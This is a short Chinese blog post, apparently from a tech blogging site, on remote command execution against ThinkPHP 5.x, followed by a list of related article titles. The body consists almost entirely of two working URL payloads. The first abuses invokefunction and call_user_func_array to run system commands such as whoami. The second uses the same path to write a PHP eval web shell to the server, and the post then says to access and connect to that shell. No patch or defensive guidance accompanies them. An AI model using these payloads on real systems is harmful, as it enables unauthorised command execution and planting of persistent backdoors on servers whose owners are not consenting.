Thinkphp5x远程命令执行及getshell

养只小羊72024-08-09 0:39

访问到网址

拼接网址,执行远程命令

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可执行php命令

getshell

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" >11.php

访问木马

连接木马

相关推荐
竹言笙熙10 小时前
代码审计初探
学习·web安全
网络安全King12 小时前
华为 网络安全 认证
安全·web安全
网络安全-老纪13 小时前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
underatted13 小时前
2025tg最新免费社工库机器人
web安全·网络安全
H轨迹H18 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
网安加云课堂19 小时前
课程分享 | 安全系统建设的挑战与解决方案
网络·安全·web安全
黑客Ela20 小时前
网络安全营运周报
网络·安全·web安全
挣扎与觉醒中的技术人20 小时前
网络安全入门持续学习与进阶路径(一)
网络·c++·学习·程序人生·安全·web安全
黑客笔记1 天前
ChatGPT超级AI对话模型 黑客十问十答
人工智能·web安全·网络安全
网络安全King1 天前
devops 工具 网络安全
运维·web安全·devops
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)05本地部署DeepSeek教程(Mac版本)06DeepSeek r1本地安装全指南07DeepSeek RAGFlow构建本地知识库系统08本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10【docker】Windows10安装Docker Desktop - WSL update failed